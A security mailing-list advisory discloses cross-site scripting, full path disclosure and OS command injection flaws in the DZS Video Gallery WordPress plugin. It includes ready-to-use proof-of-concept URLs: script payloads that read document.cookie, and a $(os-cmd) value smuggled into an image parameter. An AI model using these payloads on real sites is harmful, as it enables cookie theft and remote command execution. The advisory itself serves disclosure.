Hello list! These are Cross-Site Scripting, Full path disclosure and OS Commanding vulnerabilities in plugin DZS Video Gallery for WordPress. Earlier I've disclosed Content Spoofing and Cross-Site Scripting vulnerabilities in this plugin (http://securityvulns.ru/docs30871.html). ------------------------- Affected products: ------------------------- Vulnerable are all versions of DZS Video Gallery for WordPress. ------------------------- Affected vendors: ------------------------- Digital Zoom Studio http://digitalzoomstudio.net ---------- Details: ---------- Cross-Site Scripting (WASC-08): http://site/wp-content/plugins/dzs-videogallery/deploy/designer/preview.php?swfloc=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E http://site/wp-content/plugins/dzs-videogallery/deploy/designer/preview.php?designrand=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E Full path disclosure (WASC-13): http://site/wp-content/plugins/dzs-videogallery/videogallery.php http://site/wp-content/plugins/dzs-videogallery/admin/sliderexport.php FPD in php-files of the plugin (by default) or in error_log - in all folders of the plugin. The files vary depending on version of the plugin. OS Commanding (WASC-31): http://site/wp-content/plugins/dzs-videogallery/img.php?webshot=1&src=http://site/1.jpg$(os-cmd) RCE using method of Pichaya Morimoto (http://seclists.org/fulldisclosure/2014/Jun/117). ------------ Timeline: ------------ 2014.05.08 - announced at my site. 2014.05.09 - informed developer, but he ignored. 2014.07.12 - disclosed at my site (http://websecurity.com.ua/7152/). Best wishes & regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua